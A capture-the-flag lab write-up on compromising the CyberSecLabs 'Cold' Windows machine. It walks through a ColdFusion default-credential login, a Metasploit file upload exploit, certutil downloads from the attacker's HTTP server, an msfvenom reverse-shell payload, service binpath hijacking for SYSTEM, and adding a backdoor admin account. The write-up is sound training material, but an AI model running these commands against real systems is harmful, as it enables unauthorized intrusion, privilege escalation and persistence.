CyberSecLabs-Cold

Software Sinner
6 min read · Jul 11, 2020

This is my fifth write-up and I will be discussing my experience with the machine “Cold” from CyberSecLabs. CyberSecLabs is a great platform for people who are new to penetration testing and want to learn. Cold was listed as an easy machine but, in my opinion, it was quite the challenge. An Adobe ColdFusion file upload exploit grants user access on the server, leading to a privilege escalation through Windows services.


Step 1: Enumeration

I started off with two Nmap scans on this machine and stuck with the results from the first scan. My first scan used default scripts (-sC) and version detection (-sV). The second scan gave me pretty much the same results plus a ton of open-port rabbit holes…

sinner@kali:~$ sudo nmap -sC -sV 172.31.1.15
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-06 23:16 EDT
Nmap scan report for 172.31.1.15
Host is up (0.066s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.30)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.30
| http-title: Welcome to XAMPP
|_Requested resource was http://172.31.1.15/dashboard/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.2.30)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.30
| http-title: Welcome to XAMPP
|_Requested resource was https://172.31.1.15/dashboard/
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: COLD
| NetBIOS_Domain_Name: COLD
| NetBIOS_Computer_Name: COLD
| DNS_Domain_Name: Cold
| DNS_Computer_Name: Cold
| Product_Version: 6.3.9600
|_ System_Time: 2020-07-07T03:17:47+00:00
| ssl-cert: Subject: commonName=Cold
| Not valid before: 2020-04-26T22:49:07
|_Not valid after: 2020-10-26T22:49:07
5500/tcp open http Jetty 9.3.6.v20151106
|_http-server-header: Jetty(9.3.6.v20151106)
|_http-title: Error 404
8500/tcp open http Samsung AllShare httpd
|_http-title: 404
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: COLD, NetBIOS user: <unknown>, NetBIOS MAC: 02:65:1d:bf:21:60 (unknown)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-07-07T03:17:47
|_ start_date: 2020-07-07T03:10:15
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.87 seconds

I always start with the first port and work down the list; that way I can stay organized. Visiting port 80 brought me to an XAMPP deployment page. This page had me running around in circles for a while. After testing each port and not finding anything of interest I decided to go back and visit port 8500. There had to be something there, because none of the other ports gave me anything.

I did some googling on this port and discovered that Adobe ColdFusion usually sits behind it. I ran dirb and it did not find anything of interest. When the default wordlist gives no hits I try to locate a known wordlist for the service I am targeting; I found this one by googling “adobe coldfusion wordlist”:

I fed this into dirb with the following command and got some hits:

dirb http://172.31.1.15:8500/ /usr/share/wordlists/coldfusion.txt

I started by visiting the parent directory for the hits /CFIDE/administrator.

http://172.31.1.15:8500/CFIDE/administrator/

I got an admin login page and noticed that the username admin was already baked into the username field. I put in the password admin, because you should always try admin:admin on login pages, duh..

Sure enough…access was granted!

Step 2: Exploitation

I googled the keywords: Adobe ColdFusion exploit and found a file upload exploit in the CKEditor.

Ran the following commands:

sudo msfconsole
use exploit/multi/http/coldfusion_ckeditor_file_upload
set RHOSTS 172.31.1.15
set LHOST tun0
run

I got a low-level shell as the user jade.

Step 3: Post Exploitation

Browsing around, there is an overwhelming number of files and directories to look at. I tried pushing some privesc exploits to the box and they did not run. I noticed a ton of .bat files, and those would run for me. I did some more googling to see if there are any .bat privesc scripts and found this:

I cloned the repo onto my Kali box and hosted a simple HTTP server from the directory it was cloned into.

sudo python -m SimpleHTTPServer 80

Now, on the Windows box, I ran this to grab the file and run it.

certutil.exe -urlcache -split -f "http://youriphere:80/winPEAS.bat" winPEAS.bat

After I was done grabbing the file from my Python simple server I killed it with ctrl-z.

Looking at the results, the service path findings caught my attention and I aimed for the one for the service named cold.

Results from the winPEAS.bat

Following the link listed in the results showed me how to exploit the service path.

I focused on the section named “Modify service binary path”; it shows that you can replace the service's binary path with your desired executable.

I created a netcat executable with msfvenom, naming it what I wanted, and pushed it to the box by running the Python simple server again in the same directory where I created the file.

On my Kali machine:

sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip here> LPORT=1234 -f exe > sin.exe
sudo python -m SimpleHTTPServer 80

On the Windows Machine:

certutil.exe -urlcache -split -f "http://youriphere:80/sin.exe"

Now I baked this file into the cold service using the following command:

sc config cold binpath= "C:\ColdFusion2018\cfusion\bin\sin.exe"

It gave me the following success message, which let me know it worked:

[SC] ChangeServiceConfig SUCCESS

Now, going back to my Kali machine, I opened another terminal window, fired up another Metasploit console and created a handler to catch the connection back from the service when I start it on the Windows machine.

sudo msfconsole
use exploit/multi/handler
set LHOST tun0
set LPORT 1234
set payload windows/meterpreter/reverse_tcp
run

Going back to the Windows box I ran:

sc start cold

My handler grabbed the connection, giving me a Meterpreter shell as admin!

This is what victory smells and looks like

The connection to the box closes pretty fast, so I had to surf to the admin flag and grab it quickly.

If you don't want to race with the shell you can create a user with full privileges for persistence with the following commands:

On the Windows Machine:

net user sinner Password1! /add
net localgroup administrators sinner

Then connect with a tool I like to use called evil-winrm.

On the Kali machine:

evil-winrm -i 172.31.1.15 -u sinner -p 'Password1!'
